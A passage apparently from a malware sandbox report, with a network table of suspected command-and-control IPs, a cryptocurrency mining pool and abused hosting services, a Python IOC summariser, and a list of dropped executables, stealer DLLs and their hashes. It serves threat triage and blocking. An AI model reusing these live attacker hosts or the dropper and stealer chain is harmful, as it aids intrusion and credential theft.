NL 45.81.225.228:10774 - tcp 1
FI 135.181.208.162:49195 - tcp 1
US 34.210.194.227:80 - tcp 1
US 8.8.8.8:53 iplogger.org udp 1
DE 88.99.66.31:80 iplogger.org tcp 1
DE 88.99.66.31:443 iplogger.org tcp 3
US 8.8.8.8:53 bitbucket.org udp 1
US 104.192.141.1:443 bitbucket.org tcp 1
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp 1
US 52.217.33.252:443 bbuseruploads.s3.amazonaws.com tcp 1
US 8.8.8.8:53 pool.supportxmr.com udp 1
FR 149.202.83.171:5555 pool.supportxmr.com tcp 1
US 8.8.8.8:53 dependstar.bar udp 1
US 172.67.160.135:443 dependstar.bar tcp 1
SC 185.215.113.104:18754 - tcp 1
RU 91.142.77.155:5469 - tcp 1
US 8.8.8.8:53 product-review-now.bar udp 1
US 172.67.128.27:443 product-review-now.bar tcp 1

Repeated connections have been collapsed into one row per destination with a count (80 rows in total, kept in order of first appearance). A "-" in the Domain column marks a direct-to-IP connection with no preceding DNS query; the seven of these on non-web ports (12608, 13441, 10991, 10774, 49195, 18754, 5469) are the destinations to treat as C2 candidates first. venerynnet1.top was queried but never connected to. The 32 HTTP connections to kevonahira2.top are repeated polling of the first server the sample reached. Several entries are third-party services rather than attacker-registered names (the Discord CDN, Bitbucket and its S3 upload bucket, api.ip.sb, iplogger.org, the supportxmr mining pool), so block on the full URL, the specific IP or the pool port rather than on the domain alone.
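A small IOC summariser for the table above, added as an example and not part of the sandbox's output. It parses rows in the report's four-column layout (three columns when no domain is recorded), separates DNS lookups from resolved and direct-to-IP connections, reports names that were queried but never contacted, and singles out raw-IP destinations on non-web ports. The rows embedded below are an excerpt of the table, so counts are for the excerpt only; the list of third-party services is an assumption of this example, drawn from the "Legitimate hosting services abused" tag rather than from any data in the report.

```python
from collections import Counter, defaultdict


# Constructed excerpt of the Network table above, in the report's layout
# (Country Destination Domain Proto; the Domain column is absent for
# direct-to-IP connections). Counts below refer to this excerpt only.
NETWORK_ROWS = """
US 8.8.8.8:53 venerynnet1.top udp
US 8.8.8.8:53 kevonahira2.top udp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
NL 190.2.145.108:12608 tcp
NL 193.56.146.36:80 193.56.146.36 tcp
US 8.8.8.8:53 iryarahara.xyz udp
RU 77.246.145.4:80 iryarahara.xyz tcp
RU 45.9.20.20:13441 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 pool.supportxmr.com udp
FR 149.202.83.171:5555 pool.supportxmr.com tcp
SC 185.215.113.104:18754 tcp
"""

# Assumed list (not from the report) of third-party services the report tags as
# "Legitimate hosting services abused"; used only to keep them apart from the
# remaining domains in the summary.
PUBLIC_SERVICES = {
    "cdn.discordapp.com", "bitbucket.org", "bbuseruploads.s3.amazonaws.com",
    "api.ip.sb", "iplogger.org",
}
WEB_PORTS = {80, 443}


def parse_network(text):
    """One dict per row; domain is None for direct-to-IP connections."""
    rows = []
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            country, dest, proto = parts
            domain = None
        else:
            continue
        ip, port = dest.rsplit(":", 1)
        if domain == ip:        # Host header was the bare IP: no name was involved
            domain = None
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def summarize_network(rows):
    """Split rows into DNS lookups, name-resolved connections and direct-to-IP
    connections, then derive the sets an analyst triages first."""
    dns, direct = Counter(), Counter()
    resolved = defaultdict(Counter)
    for r in rows:
        dest = f"{r['ip']}:{r['port']}"
        if r["proto"] == "udp" and r["port"] == 53 and r["domain"]:
            dns[r["domain"]] += 1
        elif r["proto"] == "tcp" and r["domain"]:
            resolved[r["domain"]][dest] += 1
        elif r["proto"] == "tcp":
            direct[dest] += 1
    return {
        "dns": dict(dns),
        "resolved": {d: dict(c) for d, c in resolved.items()},
        "direct": dict(direct),
        # queried but never connected to (no TCP row followed the lookup)
        "queried_not_contacted": sorted(set(dns) - set(resolved)),
        # raw IP on a non-web port with no DNS: the strongest C2 candidates here
        "direct_nonweb_port": sorted(k for k in direct
                                     if int(k.rsplit(":", 1)[1]) not in WEB_PORTS),
        "public_services": sorted(set(resolved) & PUBLIC_SERVICES),
        "other_domains": sorted(set(resolved) - PUBLIC_SERVICES),
    }


if __name__ == "__main__":
    s = summarize_network(parse_network(NETWORK_ROWS))
    for key in ("queried_not_contacted", "direct_nonweb_port",
                "public_services", "other_domains"):
        print(f"{key}: {s[key]}")
    for domain, dests in s["resolved"].items():
        print(f"{domain}: {dests}")
```

Note that "other_domains" still mixes attacker-registered names with the mining pool; a production version would keep a separate allow-list of known pools so that the miner traffic is flagged as mining rather than as C2.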

Files

memory/4716-115-0x0000000000400000-0x0000000000408000-memory.dmp

memory/4716-116-0x0000000000402DCE-mapping.dmp

memory/4696-117-0x0000000000030000-0x0000000000039000-memory.dmp

memory/3080-118-0x0000000002960000-0x0000000002975000-memory.dmp

memory/4784-119-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\215E.exe

MD5 9b739fca61cbe5a22bfe0b77cce75697
SHA1 386760ae9e2cea9bf737e48d0d77c5b29ae9b1bd
SHA256 c59cecf273089ec7e37fcc7a55b135067644dc3bd90abb4c6f81d9fd63744201
SHA512 06377ab9e2e666bef740c8c1e7c194d38d60457728efb109bf59e1fbd5a23661acaafae90b7b230d43f067eb5bf806e8cc2eac8d12104d6c14bbac8e39ddb7fc

memory/4784-123-0x0000000000F90000-0x0000000000F91000-memory.dmp

memory/4784-125-0x0000000005770000-0x0000000005771000-memory.dmp

memory/4784-126-0x0000000000F70000-0x0000000000F71000-memory.dmp

memory/4784-127-0x0000000077DF0000-0x0000000077F7E000-memory.dmp

memory/4784-128-0x0000000005270000-0x0000000005271000-memory.dmp

memory/4784-129-0x0000000002E30000-0x0000000002E31000-memory.dmp

memory/4784-130-0x0000000002E90000-0x0000000002E91000-memory.dmp

memory/4784-131-0x0000000002F20000-0x0000000002F21000-memory.dmp

memory/4920-132-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\2F3A.exe

MD5 2276594f6417179702443734cc89341a
SHA1 2afd398c0408c5c41062a5ca0d43528e9a510ddf
SHA256 4c9c430cdca2a818a7c532a1ba924670bdd01e61f4e7d574123daab677e4c76e
SHA512 cb023e562b73a297eb3f2c1f6577fb33635af0da31d1264a60a664dc59bbce84d723a498dba54be34adffece90aa76ac4e269a3aad50559424b3dfe6ba0bbf85

memory/4920-135-0x00000000009C0000-0x00000000009C1000-memory.dmp

memory/4920-140-0x0000000077DF0000-0x0000000077F7E000-memory.dmp

memory/4920-141-0x0000000005A00000-0x0000000006006000-memory.dmp

memory/5024-144-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3517.exe

MD5 4a93f552d9a2747b134be963c4d1b044
SHA1 7b96e56bc6b7df56ac4d0cda72dbc2d9be65f0e4
SHA256 33bb7d8584f1353b048c0227977e9531a4125188a960babbc2a26307ca158275
SHA512 d10962a7c0027ca5dafda2e9ebc236b04284c4542f65e3cea9ec423b29012ed7fc111579e73f0b46d6e3be0ed020dc23c784c5f281abcf02071cfd904fdf1ab5

memory/5024-147-0x0000000000780000-0x00000000007B0000-memory.dmp

memory/5024-148-0x0000000000400000-0x0000000000460000-memory.dmp

memory/5024-149-0x00000000021A0000-0x00000000021BF000-memory.dmp

memory/5024-150-0x0000000004940000-0x0000000004941000-memory.dmp

memory/5024-151-0x0000000004E90000-0x0000000004EAE000-memory.dmp

memory/4100-153-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3C5B.exe

MD5 896c7cca8317b58fc449155ea1272121
SHA1 b860f4e8e49b2c446d2b85a3e8b236e583c0ec1e
SHA256 d565d2c479fd0cb15d644f82ead1c64173f67e5b6dabcde7a215010c894a607c
SHA512 a32a30c6cdab14e0f249512db27cab391e62364b8f9fb099cf6be5b159906012f2fb8128d6d310b4ec6373354c98f9a140c448479fe86ed03ed0fff051f8326a

C:\Users\Admin\AppData\Local\Temp\3C5B.exe

MD5 896c7cca8317b58fc449155ea1272121
SHA1 b860f4e8e49b2c446d2b85a3e8b236e583c0ec1e
SHA256 d565d2c479fd0cb15d644f82ead1c64173f67e5b6dabcde7a215010c894a607c
SHA512 a32a30c6cdab14e0f249512db27cab391e62364b8f9fb099cf6be5b159906012f2fb8128d6d310b4ec6373354c98f9a140c448479fe86ed03ed0fff051f8326a

memory/5024-160-0x0000000002170000-0x0000000002171000-memory.dmp

memory/5024-161-0x0000000002172000-0x0000000002173000-memory.dmp

memory/5024-163-0x0000000002174000-0x0000000002176000-memory.dmp

memory/5024-162-0x0000000002173000-0x0000000002174000-memory.dmp

memory/4784-164-0x0000000006A30000-0x0000000006A31000-memory.dmp

memory/4784-165-0x0000000007130000-0x0000000007131000-memory.dmp

memory/4784-166-0x0000000006C00000-0x0000000006C01000-memory.dmp

memory/4784-168-0x0000000006E10000-0x0000000006E11000-memory.dmp

memory/4784-169-0x0000000006F30000-0x0000000006F31000-memory.dmp

memory/4100-170-0x00000000009D0000-0x0000000000A60000-memory.dmp

memory/4100-171-0x0000000000400000-0x0000000000493000-memory.dmp

memory/4784-172-0x0000000006FD0000-0x0000000006FD1000-memory.dmp

\Users\Admin\AppData\LocalLow\sqlite3.dll

MD5 f964811b68f9f1487c2b41e1aef576ce
SHA1 b423959793f14b1416bc3b7051bed58a1034025f
SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

memory/4128-174-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\48FE.exe

MD5 fbe52cb1e8984491597e95d1be29b921
SHA1 2e46c6964739e2de11b1be7d7666738d28021a76
SHA256 fad3d5106b87c610a2203218a84d3a74469da11818882ea9a7d75f001ca639a3
SHA512 1675d8ec937e24debd9638ad53e98ea23a71b9e5483538c1d731ca8c21e055fd07decf5d0d7f4d544efecfbe6827821f82ce0b63dffc05270e274b784fad03d2

C:\Users\Admin\AppData\Local\Temp\48FE.exe

MD5 fbe52cb1e8984491597e95d1be29b921
SHA1 2e46c6964739e2de11b1be7d7666738d28021a76
SHA256 fad3d5106b87c610a2203218a84d3a74469da11818882ea9a7d75f001ca639a3
SHA512 1675d8ec937e24debd9638ad53e98ea23a71b9e5483538c1d731ca8c21e055fd07decf5d0d7f4d544efecfbe6827821f82ce0b63dffc05270e274b784fad03d2

memory/4128-177-0x0000000077DF0000-0x0000000077F7E000-memory.dmp

memory/4128-179-0x0000000000D50000-0x0000000000D51000-memory.dmp

memory/4128-193-0x0000000005550000-0x0000000005551000-memory.dmp

memory/4448-194-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\512D.exe

MD5 66a44c759def3503e2ebfabca517cfa0
SHA1 ca4bf41eec17ba26831cf61fcf0cec4c306a8f4b
SHA256 c0a67126590124954c0a73f103b9f1f04d0aee8b4df2968f124a801b7cdf87fe
SHA512 ae8d879e313aa2813144c55538fef04d60d282e8de0dc12f8ef04068d3bc69e83ba2073028706f882a7bd2df8819c3bd5b5435009bd363864644b8ccb220e360

C:\Users\Admin\AppData\Local\Temp\512D.exe

MD5 66a44c759def3503e2ebfabca517cfa0
SHA1 ca4bf41eec17ba26831cf61fcf0cec4c306a8f4b
SHA256 c0a67126590124954c0a73f103b9f1f04d0aee8b4df2968f124a801b7cdf87fe
SHA512 ae8d879e313aa2813144c55538fef04d60d282e8de0dc12f8ef04068d3bc69e83ba2073028706f882a7bd2df8819c3bd5b5435009bd363864644b8ccb220e360

\Users\Admin\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll

MD5 02cc7b8ee30056d5912de54f1bdfc219
SHA1 a6923da95705fb81e368ae48f93d28522ef552fb
SHA256 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA512 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

\Users\Admin\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll

MD5 eae9273f8cdcf9321c6c37c244773139
SHA1 8378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256 a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA512 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

memory/4784-199-0x00000000070E0000-0x00000000070E1000-memory.dmp

memory/4448-207-0x0000000002500000-0x00000000025D2000-memory.dmp

memory/4448-208-0x0000000000400000-0x0000000000563000-memory.dmp

memory/4488-209-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5B50.exe

MD5 a8386e3c88de25a8f904fdfa69daac69
SHA1 017860c60d4ba68e2a16243804088f79d246055d
SHA256 09b828682642001d90e518edc46110245320f0e69c99a9e2733ca4818614b2d1
SHA512 68c77c76f61808fa2baa5f76f61315a12987bf7b277afc75f8d5dde0f4d315f524d1d157fd435fd24cb4d4fb050ce55947eca2696b4168c7340912b1c43d4b9c

memory/4488-212-0x0000000000B40000-0x0000000000B41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6023.exe

MD5 922f4c38e12bd2de4922322c2b4e41ab
SHA1 4e0d25705cfba043fefbaaadebedbb3836220aa6
SHA256 4d5dd2f34ad1fc1c1930097678e16d11a8753b36279f5531b1b6f0a4fd3288ba
SHA512 239cde5d1a89ef36b6a392170a24489e248dcaaff1b108bf1611121bcfd746d8c97a27caae1d513f0815e23c8e2eae3b7cdb88b35335971255490ae6c95362f2

memory/4600-219-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6023.exe

MD5 922f4c38e12bd2de4922322c2b4e41ab
SHA1 4e0d25705cfba043fefbaaadebedbb3836220aa6
SHA256 4d5dd2f34ad1fc1c1930097678e16d11a8753b36279f5531b1b6f0a4fd3288ba
SHA512 239cde5d1a89ef36b6a392170a24489e248dcaaff1b108bf1611121bcfd746d8c97a27caae1d513f0815e23c8e2eae3b7cdb88b35335971255490ae6c95362f2

memory/4600-222-0x0000000000110000-0x0000000000111000-memory.dmp

memory/4488-225-0x00000000034C0000-0x00000000034C1000-memory.dmp

memory/4488-223-0x0000000077DF0000-0x0000000077F7E000-memory.dmp

memory/4600-229-0x0000000002420000-0x0000000002421000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6B21.exe

MD5 8cb90073d09036b3732ac02b912cdf91
SHA1 17182316980a955f085c7ff74d7442709b6cc62f
SHA256 32950322c0e9d0581faea99fdf06703ef6e0c1eab9ef2a720c400ef69e036b09
SHA512 ed9f27ec50fd1aad40c90a31b11fa67214f94eb7216ee936b8ef25bc18907f773088c5b961421f8d902ecc7c3f5559a6e3326d54ae898eb4d19548cd4031a29f

memory/616-238-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6B21.exe

MD5 8cb90073d09036b3732ac02b912cdf91
SHA1 17182316980a955f085c7ff74d7442709b6cc62f
SHA256 32950322c0e9d0581faea99fdf06703ef6e0c1eab9ef2a720c400ef69e036b09
SHA512 ed9f27ec50fd1aad40c90a31b11fa67214f94eb7216ee936b8ef25bc18907f773088c5b961421f8d902ecc7c3f5559a6e3326d54ae898eb4d19548cd4031a29f

memory/616-246-0x0000000005600000-0x0000000005601000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6023.exe

MD5 922f4c38e12bd2de4922322c2b4e41ab
SHA1 4e0d25705cfba043fefbaaadebedbb3836220aa6
SHA256 4d5dd2f34ad1fc1c1930097678e16d11a8753b36279f5531b1b6f0a4fd3288ba
SHA512 239cde5d1a89ef36b6a392170a24489e248dcaaff1b108bf1611121bcfd746d8c97a27caae1d513f0815e23c8e2eae3b7cdb88b35335971255490ae6c95362f2

memory/1192-248-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6F48.exe

MD5 5a69e2f5e30d05abb8b5367aba095f4c
SHA1 8cea80c4135c54e831c3751e6b25d8ceb2720703
SHA256 854d953d7bc8a95f98e238c9499cae881e8ca8d32020527f7a297a708aeb7ac3
SHA512 dc0ec0cf9392c720c6634e3ebac6b7f8e20800f4fc3e6f9110628efa7019ace21d30a61a2c98f03b121bc55a665175ad97dad96e7e43a1d61d8cb1051a11dbd7

C:\Users\Admin\AppData\Local\Temp\6F48.exe

MD5 5a69e2f5e30d05abb8b5367aba095f4c
SHA1 8cea80c4135c54e831c3751e6b25d8ceb2720703
SHA256 854d953d7bc8a95f98e238c9499cae881e8ca8d32020527f7a297a708aeb7ac3
SHA512 dc0ec0cf9392c720c6634e3ebac6b7f8e20800f4fc3e6f9110628efa7019ace21d30a61a2c98f03b121bc55a665175ad97dad96e7e43a1d61d8cb1051a11dbd7

memory/1488-251-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\6FED.bat

MD5 23e71d6fea8aa3a5b563b3d6f3eb6a8d
SHA1 a84dd72ec8513ed7891eb1f31259379b835229d6
SHA256 957938e9c0d901f9e96e36e04fc6a8e250808725559c406cf53573554ad129ad
SHA512 199ef9a30e4d11e9e584d9c50d348d8ff5266c50c59e8eae3149c99dcddde03371f0a464c547e95aef8e03e1ee8db5985e103bd0f6218af42fa67c2dc89ab093

memory/1588-253-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe

MD5 b019efc4814c7a73b1413a335be1fa13
SHA1 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256 a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512 d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe

MD5 b019efc4814c7a73b1413a335be1fa13
SHA1 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256 a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512 d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe

MD5 b019efc4814c7a73b1413a335be1fa13
SHA1 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256 a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512 d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

memory/1952-256-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\21598\33.exe

MD5 a6a676051f857d516f6c4bec595a7cfb
SHA1 10e7c48a109ffbe60fa7ab3585c4bd711942cbd2
SHA256 98686e602b5f75bbceb801ca315617579ad9ffe9e2df66d49673ea35a7e1f343
SHA512 df302b28e5897bac668ad1ae2b32d2424af7c8cdf4527ac54ea268e6e9fbf41efe28b236af25ceacb5e5acd95b6c99b8cf95fa735687358a265bd59e2b127ba6

memory/2132-259-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\21598\PLQRfphz.exe

MD5 5aeb767b510b7f98e34bacfb48ad6aee
SHA1 c76d2a201687988213bf097e07db45a840131025
SHA256 a354c672e502b1f84041b96c0db87f9f63868908ab01a9d993476854de4834a7
SHA512 0f07af063e61a0b5651c1a1fbd12e776e8f9c7725c893b11bffb3e54f5eb3cd71ced4a37caac512b3a028157e886338ff6e42a8fd3f8c11c649b0afeb251914b

memory/2248-261-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\21598\PLQRfphz.exe

MD5 5aeb767b510b7f98e34bacfb48ad6aee
SHA1 c76d2a201687988213bf097e07db45a840131025
SHA256 a354c672e502b1f84041b96c0db87f9f63868908ab01a9d993476854de4834a7
SHA512 0f07af063e61a0b5651c1a1fbd12e776e8f9c7725c893b11bffb3e54f5eb3cd71ced4a37caac512b3a028157e886338ff6e42a8fd3f8c11c649b0afeb251914b

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe

MD5 b019efc4814c7a73b1413a335be1fa13
SHA1 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256 a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512 d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

C:\Users\Admin\AppData\Local\Temp\745A.exe

MD5 c8d4b455187ceb42f74d7786911a37ea
SHA1 350fc1dbface497fe660ecde0194d8b5b34dfcf5
SHA256 40e766ae6379c7b1e8cace0538a16db203c26bd6a84bab99fa79ee0dcc6abd4f
SHA512 5f1133ad01741ec6d367e1aaafbc962763b608c12502df224c488305d72caf75a84cbad7a45e9b342b4bee4289df012b0368a431869876f618cdf1e0ab21c0fd

memory/2704-271-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\745A.exe

MD5 c8d4b455187ceb42f74d7786911a37ea
SHA1 350fc1dbface497fe660ecde0194d8b5b34dfcf5
SHA256 40e766ae6379c7b1e8cace0538a16db203c26bd6a84bab99fa79ee0dcc6abd4f
SHA512 5f1133ad01741ec6d367e1aaafbc962763b608c12502df224c488305d72caf75a84cbad7a45e9b342b4bee4289df012b0368a431869876f618cdf1e0ab21c0fd

memory/2132-276-0x0000000005190000-0x0000000005796000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6B21.exe

MD5 8cb90073d09036b3732ac02b912cdf91
SHA1 17182316980a955f085c7ff74d7442709b6cc62f
SHA256 32950322c0e9d0581faea99fdf06703ef6e0c1eab9ef2a720c400ef69e036b09
SHA512 ed9f27ec50fd1aad40c90a31b11fa67214f94eb7216ee936b8ef25bc18907f773088c5b961421f8d902ecc7c3f5559a6e3326d54ae898eb4d19548cd4031a29f

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6B21.exe.log

MD5 41fbed686f5700fc29aaccf83e8ba7fd
SHA1 5271bc29538f11e42a3b600c8dc727186e912456
SHA256 df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512 234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

memory/768-283-0x000000000041C5DE-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6023.exe.log

MD5 41fbed686f5700fc29aaccf83e8ba7fd
SHA1 5271bc29538f11e42a3b600c8dc727186e912456
SHA256 df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512 234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

C:\Users\Admin\AppData\Local\Temp\6023.exe

MD5 922f4c38e12bd2de4922322c2b4e41ab
SHA1 4e0d25705cfba043fefbaaadebedbb3836220aa6
SHA256 4d5dd2f34ad1fc1c1930097678e16d11a8753b36279f5531b1b6f0a4fd3288ba
SHA512 239cde5d1a89ef36b6a392170a24489e248dcaaff1b108bf1611121bcfd746d8c97a27caae1d513f0815e23c8e2eae3b7cdb88b35335971255490ae6c95362f2

memory/1136-296-0x000000000041C606-mapping.dmp

memory/768-308-0x0000000004E60000-0x0000000005466000-memory.dmp

memory/1136-309-0x0000000005A10000-0x0000000006016000-memory.dmp

memory/4548-329-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\fl.exe

MD5 7f34c12f88020dcc02f994529fb48222
SHA1 41446495e7817e0d5eb2a1c51a7f0984b56d36f8
SHA256 38582026970861e90f4f3f15da60fa5c8bc8759a2fab6c58a6c262d9096ac1e4
SHA512 c6373d56a0496f88d129bdf614e5ec063a7c02a84cfd8f37dd83208d3cfedce7de1cd534c25d3ffcb260c31f5792df7371fc795b152095c5a71eecd93bbdc5a9

C:\Users\Admin\AppData\Local\Temp\fl.exe

MD5 7f34c12f88020dcc02f994529fb48222
SHA1 41446495e7817e0d5eb2a1c51a7f0984b56d36f8
SHA256 38582026970861e90f4f3f15da60fa5c8bc8759a2fab6c58a6c262d9096ac1e4
SHA512 c6373d56a0496f88d129bdf614e5ec063a7c02a84cfd8f37dd83208d3cfedce7de1cd534c25d3ffcb260c31f5792df7371fc795b152095c5a71eecd93bbdc5a9

memory/4536-333-0x0000000000000000-mapping.dmp

memory/4536-345-0x00000233F4580000-0x00000233F4582000-memory.dmp

memory/4536-346-0x00000233F4583000-0x00000233F4585000-memory.dmp

memory/4536-347-0x00000233F4586000-0x00000233F4588000-memory.dmp

memory/4536-392-0x00000233F4588000-0x00000233F4589000-memory.dmp

memory/1488-393-0x0000000000000000-mapping.dmp

C:\ProgramData\Systemd\dllhoster.exe

MD5 4c03f40035bf018553157080f1b02671
SHA1 86531b83d3b3317c9da5010357fd9b5fbfd2bebe
SHA256 d1d89ada2bd812473633d6aee4a4e1154affda7d0a5f8e3bf76638701b8c16f9
SHA512 9b20bd124fbce81e562f69c81903f54809ab10206b32b664b19862e8915093fe24a36b0095c3704fd89baca4a7f6fda01a8e3237b33be1efb82f5704080fa926

memory/1488-396-0x00000000001C0000-0x00000000001E0000-memory.dmp

memory/4172-397-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\199b1g.exe

MD5 34e8b12f54a252b5a12eb025a5a4df73
SHA1 8a012adea49ed6a856ca0de339bd56c505a3642c
SHA256 6cb5bef0a752e083ce24830cbd418201220fa6db6298d8f7e0cbd34d10903ac7
SHA512 db9228e8b2cfd49f4371c4aac1bac9787982399c575252910a5aa54e7246907ec4d0c85976f4e258e573ab6703d4c67b04bca59937f4e8e60504ddfa0994014b

memory/4880-400-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\199b1g.exe

MD5 34e8b12f54a252b5a12eb025a5a4df73
SHA1 8a012adea49ed6a856ca0de339bd56c505a3642c
SHA256 6cb5bef0a752e083ce24830cbd418201220fa6db6298d8f7e0cbd34d10903ac7
SHA512 db9228e8b2cfd49f4371c4aac1bac9787982399c575252910a5aa54e7246907ec4d0c85976f4e258e573ab6703d4c67b04bca59937f4e8e60504ddfa0994014b

memory/4976-405-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\test.exe

MD5 bdea822c8b1b29b67a9df071ebac5064
SHA1 507a60469e99c73f4941d2cb1d827ccfcb6fe013
SHA256 4f0f6d48fe06eefbfa03493b6984099ef6b9e1423d128e133a5e8e1353e4ecbd
SHA512 42c0c96b3da105bea5271baf02cb0bfa8a4b0704f1774383b19592e6e84bbd4a29b67f311151b2d5c36b334c484bf3a58aedaac33ff914b3cf68ef4b56d60de5

C:\Users\Admin\AppData\Local\Temp\test.exe

MD5 bdea822c8b1b29b67a9df071ebac5064
SHA1 507a60469e99c73f4941d2cb1d827ccfcb6fe013
SHA256 4f0f6d48fe06eefbfa03493b6984099ef6b9e1423d128e133a5e8e1353e4ecbd
SHA512 42c0c96b3da105bea5271baf02cb0bfa8a4b0704f1774383b19592e6e84bbd4a29b67f311151b2d5c36b334c484bf3a58aedaac33ff914b3cf68ef4b56d60de5

C:\Users\Admin\AppData\Local\Temp\SparestPeculation_2021-09-19_16-22.exe

MD5 9dfcf7fcbab5aa6c1fdecb718f7840ea
SHA1 c6e6043f50475555268124cda0c120f0911c1c38
SHA256 953dd899dedad266fe3d21f1382bd96be78f051ff3d260926c250044a65d4d1d
SHA512 625358f1f7b4012dee0dd09a61abddf47ed830fcf1a065c7c092813546dc53dbfe65b8a7daec63e391cf6ed7505b04dfd252e7f69f332e86e3124efa8ca1d595

C:\Users\Admin\AppData\Local\Temp\SparestPeculation_2021-09-19_16-22.exe

MD5 9dfcf7fcbab5aa6c1fdecb718f7840ea
SHA1 c6e6043f50475555268124cda0c120f0911c1c38
SHA256 953dd899dedad266fe3d21f1382bd96be78f051ff3d260926c250044a65d4d1d
SHA512 625358f1f7b4012dee0dd09a61abddf47ed830fcf1a065c7c092813546dc53dbfe65b8a7daec63e391cf6ed7505b04dfd252e7f69f332e86e3124efa8ca1d595

memory/2644-416-0x000000000041C5DA-mapping.dmp

memory/4880-417-0x000000001AE40000-0x000000001AE42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\199b1g.exe

MD5 34e8b12f54a252b5a12eb025a5a4df73
SHA1 8a012adea49ed6a856ca0de339bd56c505a3642c
SHA256 6cb5bef0a752e083ce24830cbd418201220fa6db6298d8f7e0cbd34d10903ac7
